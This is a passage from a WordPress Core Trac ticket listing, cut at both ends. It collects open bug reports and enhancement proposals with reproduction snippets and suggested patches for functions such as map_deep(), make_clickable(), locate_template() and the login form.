getMedaUrl($attID) getMedaUrl($attID) I will be really happy to work on it and include them in 4.7 " daniyalahmedk Future Releases 59900 Measure performance with a persistent object cache in performance tests swissspidy Build/Test Tools normal normal 6.6 task (blessed) assigned dev-feedback 2023-11-13T21:55:31Z 2024-03-02T12:28:31Z "Similar to #59815: Whether or not a persistent object cache is used makes a major difference on server-side performance of a WordPress site. While there are several factors impacting server-side performance and we cannot benchmark for every single one of them, object caching is a quite significant one and therefore should probably be covered, similar to internationalization. It is common for certain performance optimizations to only apply for sites with a persistent object cache, so we should be able to monitor the impact of such changes over time." flixos90 Future Releases 23895 Max upload size 0 when post_max_size = 0 johnbillion Upload 3.5.1 normal normal Future Release defect (bug) reviewing dev-feedback 2013-03-29T15:01:32Z 2017-11-29T14:29:56Z "As a convention, post_max_size can be set to 0 to disable any limitation on max post size. Quote from php.ini: {{{ ; Maximum size of POST data that PHP will accept. ; Its value may be 0 to disable the limit. It is ignored if POST data reading ; is disabled through enable_post_data_reading. ; http://php.net/post-max-size }}} WordPress does not take this into account in wp-admin/includes/template.php " moscar09 Future Releases 55257 map_deep() function incompatibility with incomplete objects in PHP 8.0+ Formatting 5.9.1 normal major Future Release defect (bug) new dev-feedback 2022-02-25T12:14:00Z 2023-08-08T17:18:22Z "Incomplete objects (`__PHP_Incomplete_Class`) used to have no issues with `map_deep()` before PHP 8.0 because it ignores any incomplete object. With PHP 8.0 - this now returns fatal error and PHP cannot continue processing. This disrupts an otherwise normal processing (before PHP 8.0). Example of uncaught error in debug.log are as follows: `PHP Fatal error: Uncaught Error: The script tried to modify a property on an incomplete object. Please ensure that the class definition ""SuperCustomXyz"" of the object you are trying to operate on was loaded _before_ unserialize() gets called or provide an autoloader to load the class definition in /wp/wp-includes/formatting.php:4998` For the `map_deep()` function to be truly compatible with PHP 8.0 ( as it was with earlier PHP versions) - can we modify this to check for incomplete objects? And if the value to be processed is an incomplete object - we skipped processing. This will make the function to behave like it was being used before PHP 8.0. As a result - the function still returns an array with incomplete objects as it was used to be working. This issue can be reproduced as follows: Environment: * PHP 8.0 * WordPress 5.9.1 * Create a dummy test PHP script as follows in the WP root directory: {{{#!php <?php require_once 'wp-load.php'; $test_data = 'a:2:{i:0;O:14:""SuperCustomXyz"":1:{s:17:"" SuperCustomXyz x"";s:4:""test"";}s:8:""testdata"";a:2:{s:1:""a"";i:1;s:1:""b"";i:2;}}'; $unserialized = maybe_unserialize($test_data); $res = map_deep($unserialized, 'stripslashes_from_strings_only'); print_r($res); }}} Using PHP 8.0+ - this now returns fatal error. In PHP 7.4 and below (where most of the WordPress sites are still using), this returns an array with an incomplete object: {{{ Array ( [0] => __PHP_Incomplete_Class Object ( [__PHP_Incomplete_Class_Name] => SuperCustomXyz [ SuperCustomXyz x] => test ) [testdata] => Array ( [a] => 1 [b] => 2 ) ) }}} " codex-m Future Releases 47164 map_deep in formatting.php do not handle null-byte Formatting 5.2.2 normal critical Future Release defect (bug) new dev-feedback 2019-05-07T08:40:16Z 2023-02-23T23:52:33Z "{{{#!php <?php foreach ( $object_vars as $property_name => $property_value ) { $value->$property_name = map_deep( $property_value, $callback ); } }}} The above code snippet in the function map_deep in formatting.php will trigger a fatal error if for some reason $property_name starts with a null-byte. null-bytes can exist in this context if $object_vars for some reason is from an object cast to an array. private and protected properties will be prefixed with null * null We've encountered it in the wild with serialized objects, and even though this is because of faulty programming (child classes with stricter access for properties than the parents) wordpress should handle this. The simples solution I can think of id to add: {{{#!php <?php foreach ( $object_vars as $property_name => $property_value ) { **if (ord($property_name) === 0) { continue; }** $value->$property_name = map_deep( $property_value, $callback ); } }}} " bitcomplex Future Releases 23308 "make_clickable problem with multiple ""Punctuation URL character""" Formatting 3.5.1 normal normal defect (bug) new dev-feedback 2013-01-28T15:09:59Z 2019-06-04T19:44:27Z "make_clickable problem with multiple ""Punctuation URL character"" E.g. {{{ http://www.wordpress.org/some-(parentheses).html }}} Results in this html code: {{{ <a href=""http://www.wordpress.org/some-(parentheses)"" rel=""nofollow"">http://www.wordpress.org/some-(parentheses)</a>.html }}} But obvious should be: {{{ <a href=""http://www.wordpress.org/some-(parentheses)"" rel=""nofollow"">http://www.wordpress.org/some-(parentheses).html</a> }}} I suggest to replace: wp-includes/formatting.php:1603 {{{ [\'.,;:!?)] # Punctuation URL character }}} with {{{ [\'.,;:!?)]{1,} # Punctuation URL character }}}" DrPepper75 Future Releases 46561 Make wp_normalize_path() on Windows resolve drive letter for drive–relative paths Filesystem API 3.9 normal minor Awaiting Review enhancement new dev-feedback 2019-03-19T09:18:48Z 2023-03-12T08:45:38Z "Though rarely used, Windows allows to omit drive letter in file path to treat is as drive–relative. This causes inconsistency where paths pointing to the same dir are not normalized to the same representation by `wp_normalize_path()`: {{{#!php <?php var_dump( wp_normalize_path( 'C:\server\www\dev' ) ); // ""C:/server/www/dev var_dump( wp_normalize_path( '\server\www\dev' ) ); // /server/www/dev << same path, but mismatch after normalize var_dump( wp_normalize_path( realpath( '\server\www\dev' ) ) ); // C:/server/www/dev << resolved drive letter before normalize }}} I think drive letter should be explicitly resolved as part of normalization for this case." Rarst Future Releases 29619 Make WP_HTTP_BLOCK_EXTERNAL more easy to use HTTP API 2.8 normal normal enhancement new dev-feedback 2014-09-10T17:46:54Z 2019-06-04T19:46:22Z "Currently when defining WP_HTTP_BLOCK_EXTERNAL it blocks all requests which would mean that WordPress itself becomes unusable because it then will also blocks it own requests to WordPress.org. Also oEmbeds stop working because they can't get their data. My idea is to make an if statement like the localhost check to allow those requests. I do get that this constant is mainly for local development but would be great to have a easy way to have a semi locked down installation. So I'm curious what you guys think about this." markoheijnen Future Releases 37646 Make wp-settings.php a series of do_actions() Bootstrap/Load normal normal Awaiting Review enhancement new dev-feedback 2016-08-12T19:07:44Z 2017-02-23T04:41:29Z "Now that #36819 is in, my master plan for `wp-settings.php` can begin. ---- '''Problem''' `wp-settings.php` makes many assumptions, many on purpose, others by necessity, some on consequence, and a few by accident. It is somewhat poorly named for what it is, and it's a mishmash of globals, function calls, class instantiations, and do_action() calls. ---- '''Solution''' `do_action()` all of the things. Make `wp-settings.php` a series of action calls. One for setting versions, one for initial constants, one for environmental setup, translations, database, plugins, themes, users, template output, and so on... Introduce a file named `wp-includes/default-actions.php` that serves 2 purposes: * Includes a bunch of new functions that wrap up sections of what's already in `wp-settings.php` * Hooks those new functions into the new actions in `wp-settings.php` ---- '''Why do we do this?''' As more robust and sophisticated plugins, themes, APIs, and systems start to use, rely on, and bend WordPress to their will, the need to override more & more pieces becomes apparent. While WordPress comes with a very handy set of default post types, taxonomies, APIs, helpers, wrappers, and tools, it may be desirable to unhook (or never load) certain pieces so that other pieces can take their place. In the past, this is done only with great intent, with strategic actions & filters in places where specific needs are being addressed. This is good in that it's predictable, but bad in that it's impossible for anyone to truly know what action or hook is *best* to perform any given subsequent action. By breaking `wp-settings.php` up into many clearly named `do_action()` calls, it becomes clearly obvious what actions perform what duties, while also introducing literally maximum flexibility in the entire system for new and exciting things to happen around WordPress itself. Imagine something like: {{{ // Load versions do_action( 'wp_settings_load_versions' ); // Load constants do_action( 'wp_settings_load_constants' ); // Load translations do_action( 'wp_settings_load_translations' ); // Load environment do_action( 'wp_settings_load_environment' ); // Load early WordPress settings do_action( 'wp_settings_load_early' ); // Load database do_action( 'wp_settings_load_database' ); // and on, and on... }}} ---- '''Epilogue''' This is a huge idea, easily scoffed at, and introduces code-churn like whoa. It would mean doubling down on WordPress's actions API, trusting it implicitly to load all of WordPress's core pieces & parts. It would open many doors to many unforeseen oddities while developers start dissecting all the ways things are tied together. It would also enable really cool external tools, like REST API drop-ins that can `SHORTINIT` WordPress if auth is missing, or WP CLI commands that can `die()` literally anywhere in the stack after they've done what they need to do. This is something I've wanted in WordPress since 2006 having seen similar in other libraries, and even old BackPress & bbPress gave nods and hints to back in the day. I'm also happy to give this a first patch if it's helpful to see visually the destruction it causes, or guide someone else along my vision for this if someone is willing and able to see it through before I am. <3" johnjamesjacoby Future Releases 39909 Make title behaviours consistent across all widgets on first load westonruter Widgets 2.8 normal normal Future Release enhancement reopened dev-feedback 2017-02-17T19:17:20Z 2021-06-25T15:47:08Z "On first load the word 'Archives' outputs as the Widget title but it doesn't appear in the input field. If there is a default text, perhaps it should show. This could also assist by users making the connection with the words and where they can edit. For example: [[Image(https://cldup.com/EK1v0wxGX1.png, 50%)]] Another example, the Calendar widget has no title and compared to the examples above this feels weird. What I think should happen is that the same title behaviour occurs for all widgets when you first load them." karmatosed Future Releases 57049 Make the use (or non-use) of `esc_url()` more consistent for translated URLs I18N normal normal Awaiting Review defect (bug) new dev-feedback 2022-11-09T20:28:33Z 2022-11-15T16:36:49Z "There are currently 122 instances of `__( 'https://` in Core (excluding those within bundled themes). Of those, 24 are passed through `esc_url()`. The general rule is that default translations representing Core are considered trusted. Following that rule, unfiltered URLs that are translated don't need to be passed through `esc_url()`, though it's unclear if URLs should be considered an exception. This should be clarified in the handbook (I couldn't find where ""core translations are trusted"" is detailed) and made consistent across the code base." desrosj Future Releases 41678 Make sure all field returns use filters in WP Query Query 1.5 normal normal Awaiting Review enhancement new needs-unit-tests 2017-08-20T13:01:32Z 2023-04-20T13:19:18Z Currently if fields is set to either `id` or `id=>parent`, it doesn't run through all the filters as these return early. spacedmonkey Future Releases 33593 Make shortcodes case insensitive Shortcodes normal normal feature request new dev-feedback 2015-08-29T00:10:16Z 2019-06-04T21:16:46Z "Right now, shortcodes are case sensitive. For example, `[thanks]Guy Incognito[/thanks]` works but `[Thanks]Guy Incognito[/Thanks]` doesn't. For me, as a developer, it makes sense. For my writers, who have complained about `[Thanks]` and the like not working, it doesn't. http://wordpress.stackexchange.com/questions/102375/are-shortcodes-case-sensitive shows that shortcodes are indeed case sensitive. But why? Why wouldn't the regex have the `i` modifier and become insensitive for the shortcode name itself (I'm not talking about shortcode parameters, just the name)?" archon810 Future Releases 41362 Make locate_template() filterable to change the template locations Themes 4.8 normal normal Awaiting Review enhancement new dev-feedback 2017-07-19T02:07:03Z 2019-10-04T20:58:40Z "Right now WordPress expects all templates to reside in the root of your theme directory. We have all come across a theme with dozens of templates and well, that can get messy. With 6 lines of code we can easily, and vastly enhance the templating system. This would provide a number of benefits: 1) This would allow developers to logical group functionally similar files / separates functional dissimilar files 2) It allows the root of the theme directory to be cleaned up and used for ""resources"" such as the functions.php and style.css files 3) By having the ability to pick and choose which templates go where, we can turn WordPress into an MVC application framework (personally what I use this technique for) 4) Related - this plays really nice with Timber 5) This lays the groundwork for future enhancements which I also use and plan to introduce shortly = Examples = == Moving all templates with the {{{""templates_path""}}} filter == Say I wanted to move all my templates into a directory named ""templates"" because as mentioned, this theme I inherited has dozens of templates, maybe one for each page. A good start would be to just move all the templates into a directory named ""templates"": {{{#!php <?php function move_templates($path){ return 'templates'; } add_filter('templates_path', 'move_templates'); }}} This filter would move ALL templates to the ""templates"" directory (and has the added effect of also moving the location of the header, footer ect ect files as well) . So now the root of our theme is nice and clean: {{{ /twentyseventeen/ |-- /assets/ |-- /inc/ |-- /templates/ |-- functions.php |-- index.php |-- README.txt |-- rtl.css |-- screenshot.png |-- style.css }}} Now obviously just moving dozens of templates into a different directory just moves the mess out of site, but that directory is still a mess and just a stew of unrelated templates. == Group related templates together with the {{{""{$type}_templates_path""}}} filter == To clean things up even more. Imagine if 10 of these templates were all children of the page ""team"". You could group them all together into a subdirectory of ""templates"" called ""team"" like so: {{{#!php <?php function move_team_pages($path = '', $type = null){ $parent = get_page_by_title( 'team' ); $parent_id = $parent->ID; $obj = get_queried_object(); if($obj->post_parent == $parent_id) $path = rtrim($path, '/') . '/' . 'team'; return $path; } add_filter('page_templates_path', 'move_team_pages'); }}} Now your theme might look something like: {{{ /twentyseventeen/ |-- /assets/ |-- /inc/ |-- /templates/ |-- index.php |-- single.php |-- /team/ |-- page-mortimer.php |-- page-biff.php }}} As we see, the two filters can (and perhaps should) be used together, but can also be used alone. == Timber == As mentioned before, I use something like this on every project. I generally put all my templates into a directory called ""controllers"" and my twig files (if using Timber) into a directory called ""views"" so I have something akin to an MVC application. My functions file sets Timber to look for twig files in a directory called ""views"" which is right inside the theme directory (next to ""templates""): {{{ $timber = new \Timber\Timber(); Timber::$dirname = array('views'); }}} so my {{{ templates/index.php}}} could set up my Timber context and pass it all the way to the {{{ index.twig }}} file in the ""views"" directory: {{{ $context = Timber::get_context(); $context['posts'] = Timber::get_posts(); Timber::render('index.twig', $context); }}} " kylejennings83 Future Releases 26516 Make it easier to check theme support obenland Themes 2.9 normal normal enhancement assigned dev-feedback 2013-12-10T02:02:22Z 2019-06-04T21:09:49Z "Currently we don't make it too easy for plugins (and themes I suppose) to get access to the information passed in the second argument to `add_theme_support()`. To get more information about a theme's support for post thumbnails for example, a plugin would have to assign the return value of `get_theme_support()` to a variable and then access the value stored in the first key of the returned array: {{{ #!php <?php $support = get_theme_support( 'post-thumbnails' ); $actual_support = $support[0]; }}} While this is not ideal for core features that themes need to register support for, it gets painful quickly when themes and plugins want to deal with information coupled to a custom feature." obenland Future Releases 17491 Make is_email() compliant with RFC5322 (updated by RFC6854) Formatting 3.1.2 normal minor Future Release defect (bug) reopened needs-unit-tests 2011-05-18T14:48:52Z 2023-04-14T13:59:42Z is_email('toto.@toto.com') returns true arena Future Releases 31821 Make interim login URL filterable johnbillion Login and Registration 4.2 normal normal Future Release enhancement reviewing dev-feedback 2015-03-31T14:36:20Z 2017-08-22T14:40:51Z Currently, there is no clean way to detect and filter the interim login URL, short of using the ''clean_url'' filter. Obviously, this is not ideal. Plugins that modify the login URL, like my plugin, Theme My Login, would definitely benefit from a direct filter on this. jfarthing84 Future Releases 17924 Make Integrating Multiple Roles Per User Easier for Plugin Authors Role/Capability 2.0 normal major Awaiting Review enhancement new dev-feedback 2011-06-28T23:40:48Z 2021-07-20T16:41:38Z "WordPress supports multiple role per user, however to use this feature is very difficult for plugin authors to integrate well, and often requires adding plugin admin pages instead of integrating with the pre-existing user-edit.php. Due to the difficulty of this, and the fact that most plugins that allow this aren't very user-friendly, I believe users are staying away from multiple roles. This ticket aims to change how easy it is to work with the current role management system, as well as to add a couple role-based filters and actions, while still keeping the front-end of the administrative interface single-role only. (Because it seems to be the prevailing opinion the multiple roles per user is plugin territory.) In addition, I completely agree that the vast majority of sites can best function with one role per user, however in some cases (such as the site I'm working on now) you simply need to be able to choose multiple roles. = Changes = == First Patch File == attachment:Replace_Admin_Role_Dropdown.patch The first patch file moves the code for the role dropdown off of /wp-admin/user-edit.php, /wp-admin/includesclass-wp-users-list-table.php, /wp-admin/users-new.php, /wp-admin/options-general.php and into /wp-admin/includes/template.php where two new functions are created: === {{{wp_get_dropdown_roles()}}} === This function does what {{{wp_dropdown_roles}}} used to do, but it returns the value instead of echoing it. (Note that {{{wp_dropdown_roles()}}} now acts as a wrapper for {{{wp_get_dropdown_roles()}}}. (The old function is still in place for backwards compatibility.) === {{{wp_user_role_selector()}}} === This function creates the full dropdown and applies a new {{{'user_role_selector'}}} filter to the markup before echoing it out. This way the default dropdown can be overridden by something else (perhaps checkboxes). == Second Patch File == attachment:Create_Role_Update_Actions_Filters.patch The second patch file changes the functions that handle user creation and updating so they can be hooked into and a developer could make this work with multiple roles. This file affects /wp-admin/includes/users.php and /wp-includes/user.php. === {{{wp_sanitize_user_role()}}} === A new {{{sanitize_user_role}}} filter was created and sanitation of {{{$_POST['role']}}} in /wp-admin/includes/user.php when user-edit.php is submitted was moved there. The new function is called {{{wp_sanitize_user_role()}}}. (This is so that if user-edit.php is submitted and {{{$_POST['role']}}} were to contain a value other than a string (perhaps an array of roles) it can be sanitized and worked with accordingly. === {{{pre_user_role}}} === A new {{{pre_user_role}}} filter was added to {{{wp_insert_user()}}} in /wp-includes/user.php. This was mainly done because almost every other field that this function processes has a matching filter like this, and I thought maybe {{{$roles}}} felt left out as it did not. :( I supposed somebody could also use it for something useful as well. === {{{apply_user_role}}} === A new {{{apply_user_role}}} action was added to {{{wp_insert_user()}}}. The function itself no longer uses {{{$user->set_role()}}}, instead saving user role changes is now handled by this new action. A matching function {{{wp_apply_user_role()}}} was added to set the user role like {{{wp_insert_user()}}} used to do. This way however, a plugin author could simply hook into {{{apply_user_role}}} to apply multiple roles to a user. = Conclusion = All in all, this patch was designed so that the average user would never even notice that a change has been made to user management, however a plugin author looking to add an easy way for people to select multiple roles for a user can quickly hook into this and have a nice, easy, well integrated and WordPress-like plugin. I have done a few tests adding users and changing roles around with these patches applied on a fresh installation with no plugins and the only changes to WordPress being those that are in the attached patches, and everything seems to work seamlessly. By the way, I am quite new to WordPress, so I added the needs-testing tag, because it does, but I also want to make sure I've done everything the 'WordPress' way and I want to make sure I havn't missed anything that is broken because of these small changes." mobius5150 Future Releases 9611 Make comment feeds fail with an error code when comments are closed Feeds 2.8 normal normal enhancement new dev-feedback 2009-04-21T14:12:42Z 2019-06-04T19:42:34Z "This is mostly a suggestion as an enhancement. When you close a post's comments and pings, it should no longer output an rss feed. Instead, it should return a not found (404) or gone (410) error and die. Likewise, if all posts and pages on a site disallow comments and pings, the comments feeds should not be broadcast, and should return the same error code. Thoughts?" Denis-de-Bernardy Future Releases 31093 Make $tag argument optional for has_shortcode() Shortcodes normal normal Future Release enhancement new dev-feedback 2015-01-21T19:53:17Z 2017-10-31T09:25:16Z Use case: I'd like to see if my string has ''any'' shortcodes. danielbachhuber Future Releases 37921 "Make ""newbloguser"" URL segment customizable/filterable" Users normal normal Awaiting Review feature request new dev-feedback 2016-09-02T16:25:45Z 2019-04-19T13:33:20Z "The built-in multisite user invitation URL is forced into using `/newbloguser/` as the invitation endpoint to all sites. When employing WordPress Multisite in an environment that isn't for blogging, this endpoint does't make much sense. Because this value is hardcoded, the only way to change this is to roll your own invitation system entirely, which is a lot of work for a little bit of vanity. I don't think the invitation system itself is too bad, and it will be easy to make this segment filterable." johnjamesjacoby Future Releases 55193 login-form: Use the same id and class value between wp_login_form() and wp-login.php Login and Registration normal normal Awaiting Review enhancement new dev-feedback 2022-02-18T05:57:43Z 2023-08-18T12:05:40Z "Hi, below are the codes of login forms html output of `wp_login_form()` function, and wp-login.php page {{{ <!-- The html output of login-form in wp-login.php page --> <form name=""loginform"" id=""loginform"" action=""https://xxxxxxxxxx/wp-login.php"" method=""post""> <p> <label for=""user_login"">Username or Email Address</label> <input type=""text"" name=""log"" id=""user_login"" class=""input"" value="""" size=""20"" autocapitalize=""none""> </p> <div class=""user-pass-wrap""> <label for=""user_pass"">Password</label> <div class=""wp-pwd""> <input type=""password"" name=""pwd"" id=""user_pass"" class=""input password-input"" value="""" size=""20""> <button type=""button"" class=""button button-secondary wp-hide-pw hide-if-no-js"" data-toggle=""0"" aria-label=""Show password""> <span class=""dashicons dashicons-visibility"" aria-hidden=""true""></span> </button> </div> </div> <p class=""forgetmenot""> <input name=""rememberme"" type=""checkbox"" id=""rememberme"" value=""forever""> <label for=""rememberme"">Remember Me</label> </p> <p class=""submit""> <input type=""submit"" name=""wp-submit"" id=""wp-submit"" class=""button button-primary button-large"" value=""Log In""> <input type=""hidden"" name=""redirect_to"" value=""https://xxxxxxxxxx/""> <input type=""hidden"" name=""testcookie"" value=""1""> </p> </form> }}} {{{ <!-- The html output of login-form with wp_login_form() function --> <form name=""loginform"" id=""loginform"" action=""https://xxxxxxxxxx/wp-login.php"" method=""post""> <p class=""login-username""> <label for=""user_login"">Username or Email Address</label> <input type=""text"" name=""log"" id=""user_login"" class=""input"" value="""" size=""20"" tabindex=""0""> </p> <p class=""login-password""> <label for=""user_pass"">Password</label> <input type=""password"" name=""pwd"" id=""user_pass"" class=""input"" value="""" size=""20"" tabindex=""0""> </p> <p class=""login-remember""> <label> <input name=""rememberme"" type=""checkbox"" id=""rememberme"" value=""forever"" tabindex=""0""> Remember Me </label> </p> <p class=""login-submit""> <input type=""submit"" name=""wp-submit"" id=""wp-submit"" value=""Log In"" tabindex=""0"" class=""button button-primary""> <input type=""hidden"" name=""redirect_to"" value=""https://xxxxxxxxxx/""> </p> </form> }}} Look into same field between the two html outputs, you can see most of the p, label, and input tag has different values of the css ids and classes. for example: wp_login_form(): {{{<input name=""rememberme"" type=""checkbox"" id=""rememberme"" value=""forever"">}}} wp-login.php: {{{<input name=""rememberme"" type=""checkbox"" id=""rememberme"" value=""forever"" tabindex=""0"">}}} the ids are the same, but wp_login_form(): {{{<p class=""forgetmenot"">}}} wp-login.php: {{{<p class=""login-remember"">}}} the classes are different Can you make the ids and classes same, so it will be easier for me to make the two login forms ( `wp_login_form()` and wp-login.php ) with consistent style? " syshut Future Releases 14949 Login gives false assurance of having logged out rajinsharwar* Login and Registration normal normal Future Release defect (bug) accepted dev-feedback 2010-09-23T10:39:34Z 2023-09-27T19:35:30Z "If you visit `wp-login.php?loggedout=true` while logged in, WordPress falsely tells you that ""You are now logged out."" This is a problem because it could lead you to think, e.g., that a public computer is no longer authenticated with access to your WP admin. Patch redirects a still-authenticated user back to the admin from the login page if she requests the above page without actually having logged out." filosofo Future Releases 28517 Logic error in WP_Rewrite flush_rules Rewrite Rules 3.7 normal normal Future Release defect (bug) new dev-feedback 2014-06-12T20:42:02Z 2017-05-18T15:06:04Z "The current logic in flush_rules of WP_Rewrite is flawed: {{{ if ( ! $hard || ! apply_filters( 'flush_rewrite_rules_hard', true ) ) { return; } }}} Given the four possible scenarios: $hard has two unique values: * true (by default) * false Casting apply_filters( 'flush_rewrite_rules_hard', true ) to a boolean also has two unique values: * true (by default) * true (a filter returns a value that evaluates to true) * false (a filter returns a value that evaluates to false) ============================================= If $hard is true and either no filters are added, or a filter is added that returns true: {{{ ! true || ! true = false || false = false }}} {{{ #!html <span style=""color: red; font-weight: strong;"" >UNINTENTIONAL FAILURE</span> }}} ============================================= If $hard is true and a filter is added that returns false: {{{ ! true || ! false = false || true = true }}} {{{ #!html <span style=""color: orange; font-weight: strong;"" >UNINTENTIONAL SUCCESS</span> }}} ============================================= If $hard is false and either no filters are added, or a filter is added that returns true: {{{ ! false || ! true = true || false = true }}} {{{ #!html <span style=""color: orange; font-weight: strong;"" >UNINTENTIONAL SUCCESS</span> }}} ============================================= If $hard is false and a filter is added that returns false: {{{ ! false || ! false = true || true = true }}} {{{ #!html <span style=""color: red; font-weight: strong;"" >UNINTENTIONAL FAILURE</span> }}} ============================================= As seen above, 50% of the unique scenarios give an unexpected response. While the other 50% of the scenarios give the expected response, but for the wrong reason." numis Future Releases 15760 "LiveJournal Importer mishandles some <lj-cut> and <lj user=""""> expressions" westi Import normal normal WordPress.org defect (bug) assigned dev-feedback 2010-12-10T04:45:17Z 2017-05-23T15:16:47Z "There is a note on plugins.trac ticket 1231 that says this should be handled in core.trac instead, so I'm cross-posting it here. The patch and ticket were originally added by a-bishop: http://plugins.trac.wordpress.org/ticket/1231 Reproduction steps: 1. Create a LiveJournal? entry that has <lj user=""foo"" /> in it. Note that this is XML-ish 2. Try to use the livejournal-importer on this post. Bug The <lj user=""foo"" /> gets ignored because the regular expression is too strict. I've attached a patch that makes LiveJournal? Importer recognize the XML-ish version. Patch:[[BR]] http://plugins.trac.wordpress.org/attachment/ticket/1231/livejournal-importer.patch" designsimply Future Releases 28326 List Tables don't update properly after Quick Edit Quick/Bulk Edit normal normal defect (bug) new dev-feedback 2014-05-21T15:06:40Z 2023-02-17T09:19:06Z "Scenario: I have 2 sticky posts. I go to the Post list table and click the ""Sticky (2)"" link. I see my 2 stickies. I Quick Edit one of them and make it no sticky. What do I see? (drumroll): Both posts + a link that says ""Sticky (2)"" " wonderboymusic Future Releases 39587 link problems with language settings I18N 4.7 normal normal Awaiting Review defect (bug) new dev-feedback 2017-01-15T01:10:15Z 2023-04-05T12:19:10Z "Dear Developers! After WP versiion 4.7 i think i found a bug it is not listed. In version 4.7 we have the option to have a X site language but with Y language admin dashboard. (clever idea Cheers for it!!) But if i use the dashboard in Y language >>> it changes the links (after you edit something) language to Y language. (maybe it is related ~only in/with woocommerce) for example the link changes from ""product"" to ""termek"" or vica-versa... makes many pages unreachable... let me know if you need any further information or help! Very Best regards!! Ben" aansel Future Releases 50233 Limit pagination for comments SergeyBiryukov Permalinks 5.4.1 normal minor Future Release defect (bug) reopened dev-feedback 2020-05-23T21:53:08Z 2022-04-26T03:30:27Z "you can look? please https://wordpress.org/support/topic/wordpress-infinite-link-problem/ Hello. WordPress has endless link problems for many years. Note: This problem happens when we paged comment example: Others: https://perishablepress.com/wordpress-infinite-duplicate-content/comment-page-2/ https://perishablepress.com/wordpress-infinite-duplicate-content/comment-page-2754/ others https://www.wpbeginner.com/beginners-guide/how-to-properly-ask-for-wordpress-support-and-get-it/comment-page-2754/ https://www.wpbeginner.com/beginners-guide/how-to-properly-ask-for-wordpress-support-and-get-it/comment-page-5754/ others https://www.isitwp.com/best-wordpress-404-error-plugins/comment-page-3754/ https://www.isitwp.com/best-wordpress-404-error-plugins/comment-page-5754/ Attention! There are no comments on these pages. But the links are entering the article. This is the problem for google search console. If there is no comment, that link should not work. How can I fix this? Paged comments from your admin panel. And you try too If we do not paginate, this is no problem. This problem happens in paginations.. If the setting is like this. screen shot: https://prnt.sc/smhi90" devrekli Future Releases 39826 LIMIT clause not required in get_options function as there's already a UNIQUE KEY on option_name Database 4.7.2 normal normal Awaiting Review enhancement new dev-feedback 2017-02-09T23:41:05Z 2020-05-07T19:31:10Z "The Core get_options (wp-includes/option.php) uses LIMIT 1 to retrieve only a single row for an option. However, the option_name field already has a UNIQUE KEY in the table schema, so it's impossible for the db to contain or return more than one row for any option_name. Barring history I'm unaware of (if there used to not be a UNIQUE KEY on this field in the past), it's safe to remove the LIMIT 1 clauses from these queries (there are a few instances in the function. While LIMIT clauses can sometimes be harmful to performance, in this particular scenario that's not the case. However, it's just superfluous." arjenlentz Future Releases 47517 Left Navigation Disappeared Administration normal normal Awaiting Review defect (bug) new dev-feedback 2019-06-10T09:27:48Z 2019-06-11T18:49:07Z "Hello, Left navigation is disappeared when we open inspect element/tool in google chrome browser after reaching to the bottom of the page on Admin Dashboard > settings > discussion. Please checked attached video. Thanks." shashank3105 Future Releases 49601 layout width bugfix for img_caption_shortcode() Media 5.4 normal normal defect (bug) reopened dev-feedback 2020-03-08T19:00:36Z 2022-10-13T21:01:21Z "`img_caption_shortcode()` in `wp-includes/media.php` is hardcoding an inline `style=""width:""` attribute on the outer `<figure>` or `<div>` element that contains the image and image caption, which it sets to the pixel width of the image. This is so the image caption is the same width as the image. The problem is that on mobile (narrow width) layouts this hardcoded figure/div element width will cause the entire container element to expand to this width, which makes the entire main content column overflow the window/viewport, so the page content overflows the screen and can't be read. Google search console also flags this issue. Here's what it looks like: Normally in CSS, themes have something simple like `img { max-width: 100%; }` to prevent images from overflowing the container element. But since WordPress is hardcoding the element width with an inline style, this takes precedence and clobbers whatever in in CSS. So it is not possible for a theme to fix this issue. The fix is simple, just use `max-width` instead of `width`. The caption text still stretches to whatever the width of the image is, but the element no longer overflows the page. Patch is attached but all it is doing is using `max-width instead of `width`." joelhardi Future Releases 13066 Last-Modified headers for individual comment feeds are incorrect jgci* Feeds 3.0 low normal Future Release defect (bug) accepted dev-feedback 2010-04-21T07:32:34Z 2022-06-28T05:18:27Z "The WP::send_headers function currently uses get_lastcommentmodified() to set the Last-Modified header for all comment feeds. This is a problem when used for individual post comment feeds. The function gets the last modified comment across all blog posts. That means that every time a comment is posted anywhere, the Last-Modified header for ALL comment feeds is refreshed. Issues: 1. This is technically incorrect, since only the global comment feed and one specific post's comment feed have changed with the last comment (not all possible comment feeds); and 2. It means that If-Modified-Since requests for other post comment feeds will not receive a 304 response when they should do (since their content hasn't changed). On blogs with many posts and many comment feeds, this will have a large impact on bandwidth because lots of requests will receive 200 responses where 304's would have done, just because a comment was posted on some other post. If I've understood the flow correctly, $wp_query hasn't been fully set up at the time this function is called, so changing this behaviour would require some change in the flow of things (e.g., the handling of last modified headers for feeds moves into the do_feed() function). But doing so would mean that Last-Modified headers are correct/meaningful and that many more 304 responses can be served. Any thoughts?" solarissmoke Future Releases 36564 Last Modified for Comments Comments 4.4 normal trivial Future Release enhancement new needs-unit-tests 2016-04-17T20:44:59Z 2017-02-12T10:37:16Z "Related #28463, #19495. Posts have a last modified and last modified gmt, but comments have no such thing. There are several proposals indicating a need for comment revision, or tracking when the comment is first created. Wanted to explore the idea of having last modified and last modified gmt stored as comment meta triggered by update_comment as a simple, low impact way of adding this feature that could be used by a variety of plugins. This could be implemented by plugin hooking to edit_comment, but if such a feature is to be useful, it needs a standard storage format." dshanske Future Releases 24958 Large number of revisions cause memory exhaustion adamsilverstein Revisions 3.6 low normal Future Release defect (bug) assigned dev-feedback 2013-08-05T17:17:59Z 2021-05-06T11:20:18Z "This may be a edge case, but if you have a a large number of revisions, a number of things can break. Right now the post in question has about 1,055 revisions. Noticeably, two things are happening: Calling wp_update_post from a plugin fails with the following error: {{{PHP Fatal error: Allowed memory size of 41943040 bytes exhausted (tried to allocate 16384 bytes) in /path/wp-includes/wp-db.php on line 1228}}} Using the new revisions API to view earlier revisions returns ""Sorry, something went wrong. The requested comparison could not be loaded."" and the error log contains the same memory exhaustion error. I can seem to update from the post edit screen. This is happening with the latest stable of 3.6 and only began happening after an update, so I suspect it's something in the new revision core/api. I haven't had a huge amount of time to investigate but my guess is it's trying to load too much revision data at one time? Maybe it should only try to load X amount of revisions at once?" jshreve Future Releases 45417 Lack of actions when wp_cache_flush is called Cache API normal trivial Future Release enhancement new dev-feedback 2018-11-26T14:08:25Z 2018-12-02T22:48:40Z "The function definition of wp_cache_flush doesn't have a do_action call, and neither does WP_Object_Cache->flush. https://core.trac.wordpress.org/browser/tags/4.9.8/src/wp-includes/cache.php#L97 https://core.trac.wordpress.org/browser/tags/4.9.8/src/wp-includes/cache.php#L498 I want to be able to run 